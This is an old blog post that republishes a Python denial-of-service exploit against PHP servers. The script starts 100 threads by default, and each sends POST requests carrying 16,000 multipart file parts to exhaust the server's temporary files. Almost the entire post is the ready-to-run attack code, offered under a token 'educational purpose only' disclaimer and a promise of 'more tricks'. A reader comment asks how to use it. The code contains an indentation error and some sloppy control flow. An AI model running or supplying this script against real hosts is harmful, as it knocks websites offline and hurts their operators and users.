19 Oct 2012

DOS Exploit for PHP hosts - Python

While surfing the internet I just got my hands on a very cool python exploit wrote by Euren which can cause Denial of Service to any host running PHP over it. It doesn't matter whether the script handles uploads or not. If host runs PHP, it is enough to cause DOS using any PHP script it serves.
By default this code will create 100 threads, each thread will send 10 requests. You're always free to increase or decrease these numbers for the impact.

Warning: This script is for educational purpose only. Use it at your own risk.

import socket
import random
import time
import threading
import sys
class Connection:
    def __init__(self, host, port):
        self._host = host
        self._port = port 
      self.sock = None
    def connect(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.connect((self._host, self._port))

    def send(self, msg):
        if not self.sock:
            raise "NotConnected"
        else:
            self.sock.send(msg)

    def close(self):
        self.sock.close()

class Exploit (threading.Thread):
    def __init__(self, host, port, target):
        self._host = host
        self._port = port
        self._target = target
        threading.Thread.__init__(self)

    def getBoundary(self):
        """ Return random boundary data """
        random.seed()
        rnd = random.randrange(100000, 100000000)
        data = "---------------------------%s" % rnd
        return data

    def createPayload(self):
        data = """POST %(target)s HTTP/1.1\r
Host: %(host)s\r
Uset-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)\r
Connection: keep-alive\r
Content-Type: multipart/form-data; boundary=%(boundary)s\r
Content-Length: %(length)s\r\n\r\n"""

        boundary = self.getBoundary()

        # Create a number of upload data, 16.000, yeah! :)
        for i in range(16000):
            data += "--%s\r\n" % boundary
            data += """Content-Disposition: form-data; name="file_%s"; filename="file_%s.txt"\r
Content-Type: text/plain\r\n
Lorem ipsum dolor sit amet, consectetur adipiscing elit. In non blandit augue.\n\r\n""" % (i, i)

        data += "--%s--\r\n" % boundary

        return data % {"host": self._host, "target": self._target, "boundary": boundary, "length": str(len(data))}

    def run(self):
        payload = self.createPayload()
        for i in range(0, 10):
            c = Connection(self._host, self._port)
            c.connect()
            c.send(payload)
            c.close()
            sys.exit(0)
        del payload
        sys.exit(0)

def usage():
    usage_data = """
 __^__                                                  __^__
( ___ )------------------------------------------------( ___ )
 | / |                                                  | \ |
 | / | Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20 | \ |
 | / | http://www.pardus.org.tr/eng/                    | \ |
 |___|                                                  |___|
(_____)------------------------------------------------(_____)

PHP denial of service exploit via temporary file exhaustion
Usage: python php-multipart-dos.py <host> <port> </adress/index.php> <child number: optional>

See source code for more information
"""

    print usage_data

if __name__ == '__main__':
    if not len(sys.argv) >= 4:
        usage()
    else:
        # is child number passed?
        if len(sys.argv) >= 5:
            child = int(sys.argv[4])
        else:
            child = 100
        print "[+] Attack started..."
        for i in range(0, child):
            try:
                exp = Exploit(str(sys.argv[1]), int(sys.argv[2]), str(sys.argv[3]))
                exp.start()
                print "[+] Opening %s childs... [%s]\r" % (child, i+1),
                sys.stdout.flush()
                i += 1
            except KeyboardInterrupt:
                print "\n[-] Keyboard Interrupt. Exiting..."
                sys.exit(1)

        # print it so that previous "Opening childs..." is still there
        print ""
        while True:
            try:
                activeChilds = threading.activeCount()
                print "[+] Waiting for childs to finish. %d remaining...\r" % activeChilds,
                sys.stdout.flush()
                # we have one main process
                if activeChilds == 1:
                    print "\nOK!"
                    sys.exit(0)
            except KeyboardInterrupt:
                print "\n[-] Exiting without waiting!"
                sys.exit(1)

Having troubles in compiling the code ? Take a look at How to Compile a Python Program.

Stay tuned for more tricks.

1 comments:

Bulan mengambang said...

how to use this script???

Post a Comment

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Online Project management